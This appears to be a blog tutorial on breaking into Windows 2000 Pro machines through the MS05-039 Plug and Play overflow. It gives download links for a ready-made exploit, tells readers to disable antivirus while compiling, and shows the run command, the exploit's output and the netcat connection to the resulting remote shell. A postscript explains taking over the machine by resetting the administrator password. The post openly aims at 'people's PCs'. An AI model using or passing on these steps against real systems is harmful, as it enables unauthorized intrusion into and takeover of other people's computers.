This hack is very very old by the way but it’s good for your training and to feel how is the penetration looks like :-) Hacking Windows 2000 Professional with MS05-039 Vulnerability – Microsoft Windows Plug and Play Remote Service Overflow.

First Story:
Around on August 2005, Microsoft announced that there is a hole / vulnerability on their operating system which affect on Windows 2000 Pro, which this hole / vulnerability is considered as “High Risk“. Please have a look at Microsoft.com and search for MS05-039 bug / vulnerability, Microsoft Windows Plug and Play Remote Service Overflow. This bug also has been used in Zotob virus and its variant, which was famous at that time. So that Microsoft also immediately urge their product especially on Windows 2000 Pro to take an action to update/patch on their Operating System. This hole also possibility vulnerable on others Microsoft Products. Like on Windows XP, 2003, or Windows Server 2000. But according to my experience, the biggest vulnerability is on Windows 2000 Pro, even already SP4 (Service Pack 4).

Tools for Hacking Action:
Here I will teach you how to hack/penetrate people’s PC which has Windows 2000 Operating System. Of course we need our tools to do such attack, so that, let’s prepare it:
1. Exploit -> Download the source at http://www.milw0rm.com/id.php?id=1149 or can be download also my hack2pro.rar in the http://rapidshare.com/files/250676508/hack2kpro.rar It including the compiled and executable exploit.
2. PC with Windows 2000 or Windows XP or Linux and connected the same network with the target
3. C Compiler for compile the exploit –> For Windows OS, you can use LCC. In linux, of course using GCC.  You can also download here –> http://rapidshare.com/files/250679635/LCC.rar
4. Install and download netcat for Windows. Linux is already available out of the box, so that’s why I love linux so much.  For Windows, you can download here http://rapidshare.com/files/250678252/Windows-netcat.rar

Now follow the steps here to hack / penetrate Windows 2000 Pro:
1. Download the exploit and compile it (You can skip this test if you download the compiled and executable exploit)
- For Linux: [root@it-hacked]# gcc -o exploit source_exploit_file.c

- For Windows: Using LCC, just open your source_exploit_file.c and then choose menu Compile (DO NOT FORGET TO TURN OFF YOUR ANTI VIRUS SYSTEM). The compile result will output an .exe file.

2. After successfully compiled, you can run the file:
- In Windows: C:\exploit.exe [IP Target] [Port Number]
- In Linux: [root@it-hacked]# ./exploit [IP Target] [Port Number]

Example:
- In Windows: C:\exploit.exe 192.168.1.100 8888
- In Windows: [root@it-hacked]# ./exploit 192.168.1.100 8888

3. Executed exploit, the results would something like:
[*] connecting to 192.168.1.100:445…ok
[*] null session…ok
[*] bind pipe…ok
[*] sending crafted packet…ok
[*] check your shell on 192.168.1.100:8888

Press Ctrl + C to halt the exploit program

4. Run a netcat:
- In Windows: C:\nc 192.168.1.100 8888
- In Linux: netcat 192.168.1.100 8888

5. If success, we will got a root shell of that Windows 2000 Pro.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>

After that, it’s up to you what you want to do. Or, give me comments if you wish me to post what we can do afterwards :-) It for next posts, if you want to !!

P.S.: The first that we might want to do is change the “administrator password”, hehehe, it’s easy in a command line, just do “net user administrator *” (without quotes) it will prompt you to type a new password even though you lost or forgot the old password, it didn’t ask anything about the old password :-)

Have fun, Happy Hacking

Bookmark and Share